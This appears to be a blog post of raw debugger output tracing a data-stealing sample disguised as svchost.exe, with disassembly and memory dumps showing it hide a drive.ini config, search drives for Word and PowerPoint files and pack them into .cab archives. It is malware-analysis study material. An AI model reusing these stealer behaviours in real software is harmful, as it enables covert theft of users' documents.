0040EE09 |. 8>LEA ECX,DWORD PTR SS:[ESP+74]

0012F594 0012F5AC |pSystemTime = 0012F5AC
0012F598 0012F610 \pFileTime = 0012F610

0040EE11 |. 5>PUSH ECX ; /pFileTime
0040EE12 |. 5>PUSH EDX ; |pSystemTime
0040EE13 |. F>CALL DWORD PTR DS:[<&KERNEL32.SystemTime>; \SystemTimeToFileTime
0040EE19 |. B>MOV ECX,41

0012F648 43 3A 5C 57 49 4E 44 4F C:\WINDO
0012F650 57 53 5C 6C 6F 67 5C 32 WS\log\2
0012F658 30 31 31 00 00 00 00 00 011…..
0012F660 00 00 00 00 00 00 00 00 ……..
0012F668 00 00 00 00 00 00 00 00 ……..

Name Building loop:

0040EECC |> 8>LEA ECX,DWORD PTR SS:[ESP+B8]
0040EED3 |. 5>PUSH ECX
0040EED4 |. E>CALL svchost.004130C0
0040EED9 |. 8>MOV EDX,DWORD PTR SS:[ESP+28]
0040EEDD |. 8>ADD ESP,10
0040EEE0 |. 6>CMP WORD PTR SS:[ESP+18],SI
0040EEE5 |. 7>JB SHORT svchost.0040EEFD
0040EEE7 |. 8>AND EDX,0FFFF
0040EEED |. 8>LEA EAX,DWORD PTR SS:[ESP+AC]
0040EEF4 |. 5>PUSH EDX
0040EEF5 |. 5>PUSH EAX
0040EEF6 |. 6>PUSH svchost.00426438 ; ASCII “%s%d”
0040EEFB |. E>JMP SHORT svchost.0040EF11

 

004163A1 |> 8>/MOV ECX,DWORD PTR SS:[EBP-3C]
004163A4 |. B>|MOV EDX,200
004163A9 |. B>|MOV EDI,800
004163AE |> 8> CMP DWORD PTR SS:[EBP-14],0
004163B2 |. 0>|JL svchost.00416AE3
004163B8 |. 8>|CMP BL,20
004163BB |. 7>|JL SHORT svchost.004163D0
004163BD |. 8>|CMP BL,78
004163C0 |. 7>|JG SHORT svchost.004163D0
004163C2 |. 0>|MOVSX EAX,BL
004163C5 |. 8>|MOV AL,BYTE PTR DS:[EAX+421304]
004163CB |. 8>|AND EAX,0F
004163CE |. E>|JMP SHORT svchost.004163D2

 

004167A9 |> 8>|SUB EAX,69
004167AC |. 0>|JE svchost.00416882
004167B2 |. 8>|SUB EAX,5
004167B5 |. 0>|JE svchost.00416858
004167BB |. 4>|DEC EAX
004167BC |. 0>|JE svchost.00416846
004167C2 |. 4>|DEC EAX
004167C3 |. 7>|JE SHORT svchost.00416816
004167C5 |. 8>|SUB EAX,3
004167C8 |.^0>|JE svchost.004165AE
004167CE |. 4>|DEC EAX
004167CF |. 4>|DEC EAX
004167D0 |. 0>|JE svchost.00416886
004167D6 |. 8>|SUB EAX,3
004167D9 |. 0>|JNZ svchost.004169C1

 

0012F642 43 3A C:
0012F64A 5C 57 49 4E 44 4F 57 53 \WINDOWS
0012F652 5C 6C 6F 67 5C 32 30 31 \log\201
0012F65A 31 31 31 31 31 30 36 35 11111065
0012F662 32 00 00 00 00 00 00 00 2…….
0012F66A 00 00 00 00 00 00 ……

0040EF7E |. 5>PUSH EDX
0040EF7F |. 5>PUSH EAX
0040EF80 |. 6>PUSH svchost.00426424 ; ASCII “%s%d.cab”
0040EF85 |. E>JMP SHORT svchost.0040EF9B
0040EF87 |> 8>AND EDX,0FFFF

0012F590 00426424 ASCII “%s%d.cab”
0012F594 0012F648 ASCII “C:\WINDOWS\log\201111110652”
0012F598 0000000C

0012F7A8 43 3A 5C 44 4F 43 55 4D C:\DOCUM
0012F7B0 45 7E 31 5C 56 49 43 54 E~1\VICT
0012F7B8 4F 52 5C 4C 4F 43 41 4C OR\LOCAL
0012F7C0 53 7E 31 5C 54 65 6D 70 S~1\Temp
0012F7C8 5C 00 00 00 00 00 00 00 \…….

0040EFB9 |. 8>LEA EDI,DWORD PTR SS:[ESP+20C]
0040EFC0 |. 5>PUSH EDX ; /Buffer
0040EFC1 |. F>REP STOS DWORD PTR ES:[EDI] ; |
0040EFC3 |. 6>PUSH 104 ; |BufSize = 104 (260.)
0040EFC8 |. F>CALL DWORD PTR DS:[<&KERNEL32.GetTempPat>; \GetTempPathA
0040EFCE |. 8>LEA EAX,DWORD PTR SS:[ESP+20C]
0040EFD5 |. 8>LEA ECX,DWORD PTR SS:[ESP+20C]
0040EFDC |. 5>PUSH EAX
0040EFDD |. 6>PUSH svchost.00426500 ; ASCII “%salldetails.txt”
0040EFE2 |. 5>PUSH ECX
0040EFE3 |. E>CALL svchost.004130C0

0012F590 0012F7A8 ASCII “C:\DOCUME~1\VICTOR\LOCALS~1\Temp\alldetails.txt”
0012F594 00426500 ASCII “%salldetails.txt”

0012F648 43 3A 5C 57 49 4E 44 4F C:\WINDO
0012F650 57 53 5C 6C 6F 67 5C 32 WS\log\2
0012F658 30 31 31 31 31 31 31 30 01111110
0012F660 36 35 32 31 32 2E 63 61 65212.ca
0012F668 62 00 00 00 00 00 00 00 b…….
004018E0 |. 8>MOV EAX,ECX
004018E2 |. 8>MOV ESI,EDI
004018E4 |. 8>MOV EDI,DWORD PTR SS:[ESP+10]
004018E8 |. C>SHR ECX,2
004018EB |. F>REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS>
004018ED |. 8>MOV ECX,EAX
004018EF |. 8>AND ECX,3
004018F2 |. F>REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[>
004018F4 |. 8>MOV ESI,EDX
004018F6 |. 8>LEA EDX,DWORD PTR SS:[ESP+24]
004018FA |. 2>SUB ESI,EBP

operations on the string of the cab file name :

Finally cab creat\ion code :

004019C3 |. 6>PUSH svchost.004016B0
004019C8 |. 6>PUSH svchost.004016A0
004019CD |. 6>PUSH svchost.00401680
004019D2 |. 6>PUSH svchost.00401670
004019D7 |. 6>PUSH svchost.00401650
004019DC |. 6>PUSH svchost.00401630
004019E1 |. 6>PUSH svchost.00401610
004019E6 |. 6>PUSH svchost.00401600
004019EB |. 6>PUSH svchost.004015F0
004019F0 |. 6>PUSH svchost.00401720
004019F5 |. 5>PUSH EDX
004019F6 |. E>CALL <JMP.&CABINET.FCICreate>

The data structure range in mem :

004015F0 8B 44 24 04 50 E8 DA 0F .D$.P…
004015F8 01 00 83 C4 04 C3 90 90 ……..
00401600 8B 44 24 04 50 E8 7C 10 .D$.P.|.
00401608 01 00 59 C3 90 90 90 90 ..Y…..
00401610 8B 44 24 0C 8B 4C 24 08 .D$..L$.
00401618 8B 54 24 04 50 51 52 E8 .T$.PQR.
00401620 CB 10 01 00 83 C4 0C C3 ……..
00401628 90 90 90 90 90 90 90 90 ……..
00401630 8B 44 24 0C 8B 4C 24 08 .D$..L$.
00401638 8B 54 24 04 50 51 52 E8 .T$.PQR.
00401640 7B 13 01 00 83 C4 0C C3 {…….
00401648 90 90 90 90 90 90 90 90 ……..
00401650 8B 44 24 0C 8B 4C 24 08 .D$..L$.
00401658 8B 54 24 04 50 51 52 E8 .T$.PQR.
00401660 51 15 01 00 83 C4 0C C3 Q…….
00401668 90 90 90 90 90 90 90 90 ……..
00401670 8B 44 24 04 50 E8 E8 16 .D$.P…
00401678 01 00 83 C4 04 C3 90 90 ……..
00401680 8B 44 24 0C 8B 4C 24 08 .D$..L$.
00401688 8B 54 24 04 50 51 52 E8 .T$.PQR.
00401690 81 17 01 00 83 C4 0C C3 ……..
00401698 90 90 90 90 90 90 90 90 ……..
004016A0 8B 44 24 04 50 E8 05 18 .D$.P…
004016A8 01 00 83 C4 04 C3 90 90 ……..
004016B0 57 68 BC 52 42 00 68 0C Wh.RB.h.
004016B8 A1 42 00 E8 19 18 01 00 .B……
004016C0 8B D0 83 C4 08 85 D2 74 …….t
004016C8 50 8B FA 83 C9 FF 33 C0 P…..3.
004016D0 F2 AE 8B 44 24 0C F7 D1 .®.D$…
004016D8 49 3B C8 73 33 8B FA 83 I;.s3…
004016E0 C9 FF 33 C0 56 F2 AE F7 ..3.V.®.
004016E8 D1 2B F9 52 8B C1 8B F7 .+.R….
004016F0 8B 7C 24 10 C1 E9 02 F3 .|$…..
004016F8 A5 8B C8 83 E1 03 F3 A4 ……..
00401700 E8 81 0F 01 00 83 C4 04 ……..
00401708 B8 01 00 00 00 5E 5F C3 …..^_.
00401710 52 E8 70 0F 01 00 83 C4 R.p…..
00401718 04 33 C0 5F C3 90 90 90 .3._….
00401720 33 C0 C3 90 90 90 90 90 3…….
00401728 90 90 90 90 90 90 90 90 ……..
The FCICreate function creates an FCI context.

hfci = FCICreate(&erf, //pointer the FCI error structure
fnFilePlaced, //function to call when a file is placed
fnMemAlloc, //function to allocate memory
fnMemFree, //function to free memory
fnFileOpen, //function to open a file
fnFileRead, //function to read data from a file
fnFileWrite, //function to write data to a file
fnFileClose, //function to close a file
fnFileSeek, //function to move the file pointer
fnFileDelete, //function to delete a file
fnGetTempFileName, //function to obtain a temporary file name
&ccab, //pointer to the FCI cabinet information structure
NULL); //client context parameter, NULL for this sample.
0012F010 0012F05C (edx)
0012F014 00401720 svchost.00401720
0012F018 004015F0 svchost.004015F0
0012F01C 00401600 svchost.00401600
0012F020 00401610 svchost.00401610
0012F024 00401630 svchost.00401630
0012F028 00401650 svchost.00401650
0012F02C 00401670 svchost.00401670
0012F030 00401680 svchost.00401680
0012F034 004016A0 svchost.004016A0
0012F038 004016B0 svchost.004016B0

$-A4 > 008B2008 ASCII “C:\DOCUME~1\VICTOR\LOCALS~1\Temp\xx2”
$-A0 > 75157830 RETURN to CABINET.75157830
$-9C > 008B2008 ASCII “C:\DOCUME~1\VICTOR\LOCALS~1\Temp\xx2”
$-98 > 00000100

00412793 |. 8>CMP EAX,10
00412796 |. 7>JE SHORT svchost.004127BE
00412798 |. 8>CMP EAX,20
0041279B |. 7>JE SHORT svchost.004127B5
0041279D |. 8>CMP EAX,30
004127A0 |. 7>JE SHORT svchost.004127AC
004127A2 |. 8>CMP EAX,40
004127A5 |.^7>JNZ SHORT svchost.00412762
004127A7 |. 8>MOV DWORD PTR SS:[EBP-10],ESI
004127AA |. E>JMP SHORT svchost.004127C1
004127AC |> C>MOV DWORD PTR SS:[EBP-10],2
004127B3 |. E>JMP SHORT svchost.004127C1

0041289F |> 6>PUSH 0 ; /hTemplateFile = NULL
004128A1 |. 5>PUSH ESI ; |Attributes
004128A2 |. F>PUSH DWORD PTR SS:[EBP-8] ; |Mode
004128A5 |. 8>LEA EAX,DWORD PTR SS:[EBP-1C] ; |
004128A8 |. 5>PUSH EAX ; |pSecurity
004128A9 |. F>PUSH DWORD PTR SS:[EBP-10] ; |ShareMode
004128AC |. F>PUSH DWORD PTR SS:[EBP-C] ; |Access
004128AF |. F>PUSH DWORD PTR SS:[EBP+8] ; |FileName
004128B2 |. F>CALL DWORD PTR DS:[<&KERNEL32.CreateFile>; \CreateFileA

$-114 > 008B2008 |FileName = “C:\DOCUME~1\VICTOR\LOCALS~1\Temp\xx2”
$-110 > C0000000 |Access = GENERIC_READ|GENERIC_WRITE
$-10C > 00000003 |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
$-108 > 0012EF1C |pSecurity = 0012EF1C
$-104 > 00000001 |Mode = CREATE_NEW
$-100 > 00000080 |Attributes = NORMAL
$-FC > 00000000 \hTemplateFile = NULL
$-F8 > 008B2008 ASCII “C:\DOCUME~1\VICTOR\LOCALS~1\Temp\xx2”

 
0040F017 |. E>CALL svchost.00401840 ; \svchost.00401840
0040F01C |. 6>PUSH svchost.00425D30 ; ASCII “ab+”
0040F021 |. 6>PUSH svchost.0042A378 ; ASCII “C:\WINDOWS\drive.ini”
0040F026 |. E>CALL svchost.00413E33

00413E33 /$ 6>PUSH 40
00413E35 |. F>PUSH DWORD PTR SS:[ESP+C]
00413E39 |. F>PUSH DWORD PTR SS:[ESP+C]
00413E3D |. E>CALL svchost.00413E13

0040F0DD |> 8>MOV EBX,DWORD PTR DS:[<&KERNEL32.GetPriv>; kernel32.GetPrivateProfileStringA
0040F0E3 |. 3>XOR EDX,EDX
0040F0E5 |. 6>PUSH svchost.0042A378 ; /IniFileName = “C:\WINDOWS\drive.ini”
0040F0EA |. 8>LEA EAX,DWORD PTR SS:[ESP+4C] ; |
0040F0EE |. 6>PUSH 0A ; |BufSize = A (10.)
0040F0F0 |. 8>MOV DWORD PTR SS:[ESP+50],EDX ; |
0040F0F4 |. 5>PUSH EAX ; |ReturnBuffer
0040F0F5 |. 6>PUSH svchost.0042A10C ; |Default = “”
0040F0FA |. 8>MOV DWORD PTR SS:[ESP+5C],EDX ; |
0040F0FE |. 6>PUSH svchost.004264F4 ; |Key = “LastHigh”
0040F103 |. 6>PUSH svchost.00426168 ; |Section = “Details”
0040F108 |. 6>MOV WORD PTR SS:[ESP+68],DX ; |
0040F10D |. F>CALL EBX ; \GetPrivateProfileStringA
0040F10F |. 8>LEA ECX,DWORD PTR SS:[ESP+48]
0040F113 |. 5>PUSH ECX
0040F114 |. E>CALL svchost.004142D5
0040F119 |. 8>ADD ESP,4
0040F11C |. 8>MOV DWORD PTR SS:[ESP+6C],EAX
0040F120 |. 3>XOR EDX,EDX
0040F122 |. 8>LEA EAX,DWORD PTR SS:[ESP+48]
0040F126 |. 6>PUSH svchost.0042A378 ; ASCII “C:\WINDOWS\drive.ini”
0040F12B |. 6>PUSH 0A
0040F12D |. 8>MOV DWORD PTR SS:[ESP+50],EDX
0040F131 |. 5>PUSH EAX
0040F132 |. 6>PUSH svchost.0042A10C
0040F137 |. 8>MOV DWORD PTR SS:[ESP+5C],EDX
0040F13B |. 6>PUSH svchost.004264EC ; ASCII “LastLow”
0040F140 |. 6>PUSH svchost.00426168 ; ASCII “Details”
0040F145 |. 6>MOV WORD PTR SS:[ESP+68],DX
0040F14A |. F>CALL EBX
0040F14C |. 8>LEA ECX,DWORD PTR SS:[ESP+48]
0040F150 |. 5>PUSH ECX
0040F151 |. E>CALL svchost.004142D5
0040F156 |. 8>MOV ECX,DWORD PTR SS:[ESP+7C] ; |
0040F15A |. 3>XOR EDX,EDX ; |
0040F15C |. 8>MOV DWORD PTR SS:[ESP+6C],EAX ; |
0040F160 |. 8>MOV DWORD PTR SS:[ESP+4C],EDX ; |
0040F164 |. 8>LEA EAX,DWORD PTR SS:[ESP+4C] ; |
0040F168 |. 6>PUSH 0A ; |Arg3 = 0000000A
0040F16A |. 8>MOV DWORD PTR SS:[ESP+54],EDX ; |
0040F16E |. 5>PUSH EAX ; |Arg2
0040F16F |. 5>PUSH ECX ; |Arg1
0040F170 |. 6>MOV WORD PTR SS:[ESP+60],DX ; |
0040F175 |. E>CALL svchost.00414290 ; \svchost.00414290
0040F17A |. 8>MOV ESI,DWORD PTR DS:[<&KERNEL32.WritePr>; kernel32.WritePrivateProfileStringA
0040F180 |. 8>ADD ESP,10
0040F183 |. 8>LEA EDX,DWORD PTR SS:[ESP+48]
0040F187 |. 6>PUSH svchost.0042A378 ; /FileName = “C:\WINDOWS\drive.ini”
0040F18C |. 5>PUSH EDX ; |String
0040F18D |. 6>PUSH svchost.004264F4 ; |Key = “LastHigh”
0040F192 |. 6>PUSH svchost.00426168 ; |Section = “Details”
0040F197 |. F>CALL ESI ; \WritePrivateProfileStringA
0040F199 |. 8>MOV EDX,DWORD PTR SS:[ESP+74]
0040F19D |. 3>XOR EAX,EAX
0040F19F |. 8>MOV DWORD PTR SS:[ESP+48],EAX
0040F1A3 |. 8>LEA ECX,DWORD PTR SS:[ESP+48]
0040F1A7 |. 6>PUSH 0A ; /Arg3 = 0000000A
0040F1A9 |. 8>MOV DWORD PTR SS:[ESP+50],EAX ; |
0040F1AD |. 5>PUSH ECX ; |Arg2
0040F1AE |. 5>PUSH EDX ; |Arg1
0040F1AF |. 6>MOV WORD PTR SS:[ESP+5C],AX ; |
0040F1B4 |. E>CALL svchost.00414290 ; \svchost.00414290
0040F1B9 |. 8>ADD ESP,0C
0040F1BC |. 8>LEA EAX,DWORD PTR SS:[ESP+48]
0040F1C0 |. 6>PUSH svchost.0042A378 ; ASCII “C:\WINDOWS\drive.ini”
0040F1C5 |. 5>PUSH EAX
0040F1C6 |. 6>PUSH svchost.004264EC ; ASCII “LastLow”
0040F1CB |. 6>PUSH svchost.00426168 ; ASCII “Details”
0040F1D0 |. F>CALL ESI
0040F1D2 |. 5>PUSH EDI
0040F1D3 |. E>CALL svchost.00413CB3
0040F1D8 |. 5>PUSH EBP
0040F1D9 |. 6>PUSH svchost.0042A378 ; ASCII “C:\WINDOWS\drive.ini”
0040F1DE |. E>CALL svchost.00413E46
0040F1E3 |. 8>ADD ESP,0C
0040F1E6 |. 8>TEST EAX,EAX
0040F1E8 |. 7>JNZ SHORT svchost.0040F1F7
0040F1EA |. 6>PUSH 6 ; /FileAttributes = HIDDEN|SYSTEM
0040F1EC |. 6>PUSH svchost.0042A378 ; |FileName = “C:\WINDOWS\drive.ini”
0040F1F1 |. F>CALL DWORD PTR DS:[<&KERNEL32.SetFileAtt>; \SetFileAttributesA
0040F1F7 |> 3>CMP DWORD PTR SS:[ESP+6C],EBP

 

0040F1EC |. 6>PUSH svchost.0042A378 ; |FileName = “C:\WINDOWS\drive.ini”
0040F1F1 |. F>CALL DWORD PTR DS:[<&KERNEL32.SetFileAtt>; \SetFileAttributesA
0040F1F7 |> 3>CMP DWORD PTR SS:[ESP+6C],EBP
0040F1FB |. 7>JE SHORT svchost.0040F207
0040F1FD |. 3>CMP DWORD PTR SS:[ESP+68],EBP
0040F201 |. 0>JNZ svchost.0040F46B

 

The doc mal part :

0040F46B |> 6>PUSH svchost.00426178
0040F470 |. 6>PUSH svchost.0042A378 ; ASCII “C:\WINDOWS\drive.ini”
0040F475 |. E>CALL svchost.00413E33
0040F47A |. 8>ADD ESP,8
0040F47D |. 3>CMP EAX,EBP
0040F47F |. 7>JE SHORT svchost.0040F4C7
0040F481 |. B>MOV ECX,41
0040F486 |. 3>XOR EAX,EAX
0040F488 |. 8>LEA EDI,DWORD PTR SS:[ESP+414]
0040F48F |. 6>PUSH svchost.0042A378 ; ASCII “C:\WINDOWS\drive.ini”
0040F494 |. F>REP STOS DWORD PTR ES:[EDI]
0040F496 |. 8>LEA EAX,DWORD PTR SS:[ESP+418]
0040F49D |. 6>PUSH 104
0040F4A2 |. 5>PUSH EAX
0040F4A3 |. 6>PUSH svchost.0042A10C
0040F4A8 |. 6>PUSH svchost.004264E0 ; ASCII “FileType”
0040F4AD |. 6>PUSH svchost.00426168 ; ASCII “Details”
0040F4B2 |. F>CALL EBX
0040F4B4 |. 8>TEST EAX,EAX
0040F4B6 |. 7>JNZ SHORT svchost.0040F4DC
0040F4B8 |. 8>LEA ECX,DWORD PTR SS:[ESP+414]
0040F4BF |. 6>PUSH svchost.004264C4 ; ASCII “*.doc;*.docx;*.ppt;*.pptx”
0040F4C4 |. 5>PUSH ECX
0040F4C5 |. E>JMP SHORT svchost.0040F4D4
0040F4C7 |> 8>LEA EDX,DWORD PTR SS:[ESP+414]
0040F4CE |. 6>PUSH svchost.004264C4 ; ASCII “*.doc;*.docx;*.ppt;*.pptx”
0040F4D3 |. 5>PUSH EDX
0040F4D4 |> E>CALL svchost.004130C0
0040F4D9 |. 8>ADD ESP,8
0040F4DC |> 8>LEA EAX,DWORD PTR SS:[ESP+44]
0040F4E0 |. 6>PUSH svchost.00426110 ; ASCII “C:”
0040F4E5 |. 5>PUSH EAX
$+4F0 > 0042A378 |FileName = “C:\WINDOWS\drive.ini”
$+4F4 > 80000000 |Access = GENERIC_READ
$+4F8 > 00000003 |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
$+4FC > 0012F520 |pSecurity = 0012F520
$+500 > 00000003 |Mode = OPEN_EXISTING
$+504 > 00000080 |Attributes = NORMAL
$+508 > 00000000 \hTemplateFile = NULL

0040F49D |. 6>PUSH 104
0040F4A2 |. 5>PUSH EAX
0040F4A3 |. 6>PUSH svchost.0042A10C
0040F4A8 |. 6>PUSH svchost.004264E0 ; ASCII “FileType”
0040F4AD |. 6>PUSH svchost.00426168 ; ASCII “Details”
0040F4B2 |. F>CALL EBX ; kernel32.GetPrivateProfileStringA
0040F4B4 |. 8>TEST EAX,EAX
0040F4B6 |. 7>JNZ SHORT svchost.0040F4DC
0040F4B8 |. 8>LEA ECX,DWORD PTR SS:[ESP+414]

00402491 |. 5>PUSH ECX ; /pFindFileData
00402492 |. 5>PUSH EAX ; |FileName
00402493 |. F>CALL DWORD PTR DS:[<&KERNEL32.FindFirstF>; \FindFirstFileA
00402499 |. 8>TEST EAX,EAX
0040249B |. 8>MOV DWORD PTR SS:[ESP+28],EAX
0040249F |. 0>JE svchost.004028F2

0012F334 008B0B89 |FileName = “C:\*”
0012F338 0012F42C \pFindFileData = 0012F42C

004024CD |> 8>/CMP BYTE PTR SS:[ESP+11C],2E
004024D5 |. 0>|JE svchost.004028B1
004024DB |. B>|MOV ESI,svchost.004252D4 ; ASCII “System Volume Information”
004024E0 |. 8>|LEA EAX,DWORD PTR SS:[ESP+11C]
004024E7 |> 8>|/MOV DL,BYTE PTR DS:[EAX]
004024E9 |. 8>||MOV CL,DL
004024EB |. 3>||CMP DL,BYTE PTR DS:[ESI]

0012F458 41 55 54 4F 45 58 45 43 AUTOEXEC
0012F460 2E 42 41 54 00 00 00 00 .BAT….
0012F468 00 00 00 00 00 00 00 …….

004024E0 |. 8>|LEA EAX,DWORD PTR SS:[ESP+11C]
004024E7 |> 8>|/MOV DL,BYTE PTR DS:[EAX]
004024E9 |. 8>||MOV CL,DL
004024EB |. 3>||CMP DL,BYTE PTR DS:[ESI]

0012F2B4 0012F2DC |Arg1 = 0012F2DC
0012F2B8 0012F300 |Arg2 = 0012F300
0012F2BC 008B0BD1 |Arg3 = 008B0BD1 ASCII “AUTOEXEC.BAT”
0012F2C0 0000000C |Arg4 = 0000000C
0012F2C4 0000001F \Arg5 = 0000001F

00401EB3 . 8>LEA ECX,DWORD PTR SS:[ESP+24] ; |
00401EB7 . C>MOV BYTE PTR SS:[ESP+5C],3 ; |
00401EBC . 5>PUSH ECX ; |Arg1
00401EBD . 8>MOV ECX,EDI ; |
00401EBF . E>CALL svchost.00402040 ; \svchost.00402040

0012F2B4 0012F2DC |Arg1 = 0012F2DC
0012F2B8 0012F300 |Arg2 = 0012F300
0012F2BC 008B0BD1 |Arg3 = 008B0BD1 ASCII “boot.ini”
0012F2C0 00000008 |Arg4 = 00000008
0012F2C4 0000001F \Arg5 = 0000001F

00401EB3 . 8>LEA ECX,DWORD PTR SS:[ESP+24] ; |
00401EB7 . C>MOV BYTE PTR SS:[ESP+5C],3 ; |
00401EBC . 5>PUSH ECX ; |Arg1
00401EBD . 8>MOV ECX,EDI ; |
00401EBF . E>CALL svchost.00402040 ; \svchost.00402040

 

 

 

 

 

 

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s